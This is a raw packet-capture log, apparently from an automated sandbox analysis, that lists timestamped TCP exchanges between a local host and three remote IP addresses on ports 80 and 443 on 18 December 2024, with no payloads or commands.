                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.874438047 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.874496937 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.874571085 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.876147032 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.876203060 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.876317978 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.878074884 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.878128052 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.878175974 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.879916906 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.879971981 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.880084991 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.881778955 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.881830931 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.881861925 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.883672953 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.883727074 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.883816004 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.885582924 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.885622025 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.885629892 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.887386084 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.887423038 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.887454987 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.889590979 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.889664888 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.889669895 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.890865088 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.890919924 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.890994072 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.892746925 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.892784119 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.892803907 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.894334078 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.894587994 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.894639969 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.895612001 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.895659924 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.895757914 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.897386074 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.897402048 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.897459030 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.898196936 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.898210049 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.898241043 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.899451971 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.899466991 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.899497986 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.900527954 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.900784016 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.901738882 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.901793003 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.901835918 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.901892900 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.903162956 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.903177023 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.903250933 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.904234886 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.904339075 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.904388905 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.905424118 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.905467987 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.905519962 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.906723022 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.906735897 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.906760931 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.907855988 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.907912016 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.908097029 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.909215927 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.909228086 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.909248114 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.910367966 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.910403013 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.910440922 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.911626101 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.911638021 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.911674976 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.912733078 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.912776947 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.912832022 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.913997889 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.914047956 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.914088011 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.915134907 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.915182114 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.915354013 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.916328907 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.916377068 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.916594028 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.917596102 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.917690992 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.917810917 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.918816090 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.918867111 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.919070959 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.919979095 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.920018911 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.920095921 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.921211958 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.921261072 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.921400070 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.922580957 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.922594070 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.922616959 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.923742056 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.923818111 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.923921108 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.924813986 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.924998045 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.925045013 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.926079035 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.926186085 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.926234007 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.927246094 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.927290916 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.927359104 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.928494930 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.928602934 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.928647041 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.929799080 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.929816008 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.929847002 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.930879116 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.930891037 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.930923939 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.931957960 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.931971073 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.932014942 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.932955027 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.932991028 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.933044910 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.934120893 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.934134007 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.934237003 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.934710979 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.935132027 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.935224056 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.935245037 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.936230898 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.936265945 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.936306953 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.937345982 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.937386036 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.937489033 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.938472033 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.938508034 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.943916082 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.966861963 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.966892004 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.966924906 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.966934919 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.966960907 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.966976881 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.978250980 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.978277922 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.978317022 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.978334904 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.978363991 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.978384972 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.978729010 CET44349782172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.979042053 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.979057074 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.979083061 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.979088068 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.979115009 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.982086897 CET49782443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.982110023 CET44349782172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.983637094 CET44349782172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.983695984 CET49782443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.984755993 CET44349784172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.989630938 CET49782443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.989752054 CET44349782172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.989867926 CET49784443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.989876986 CET44349784172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.990243912 CET44349784172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.990331888 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.990359068 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.990384102 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.990390062 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.990427017 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.990770102 CET49784443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.990822077 CET44349784172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.990995884 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.991015911 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.991039991 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.991044998 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.991079092 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.995038033 CET44349785172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.995220900 CET49785443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.995229006 CET44349785172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.996248007 CET44349785172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.996299982 CET49785443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.997307062 CET49785443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.997397900 CET44349785172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.997503042 CET44349783172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.997777939 CET49783443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.997792006 CET44349783172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.999052048 CET44349783172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.999100924 CET49783443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.999418974 CET49783443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.999464989 CET44349783172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.003720045 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.003746033 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.003772974 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.003778934 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.003810883 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.004539013 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.004556894 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.004597902 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.004602909 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.004631042 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.013820887 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.013838053 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.013878107 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.013885021 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.013911963 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.014636993 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.014659882 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.014691114 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.014699936 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.014733076 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.020612001 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.020639896 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.020668983 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.020675898 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.020713091 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.021437883 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.021456003 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.021491051 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.021495104 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.021522045 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.021538019 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.027235031 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.028078079 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.028142929 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.028151989 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.028157949 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.028438091 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.028441906 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.028479099 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.028939962 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.028951883 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.028983116 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.028997898 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.029005051 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.029050112 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.029057980 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.029094934 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.029763937 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.030644894 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.030658007 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.030684948 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.032284021 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.032330990 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.035751104 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.035768986 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.035795927 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.035801888 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.035834074 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.035857916 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.036557913 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.036575079 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.036631107 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.036631107 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.036636114 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.036674976 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.042690992 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.042710066 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.042747021 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.042758942 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.042779922 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.042795897 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.046238899 CET49782443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.046247959 CET44349782172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.046299934 CET49785443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.046304941 CET44349785172.64.41.3192.168.2.6
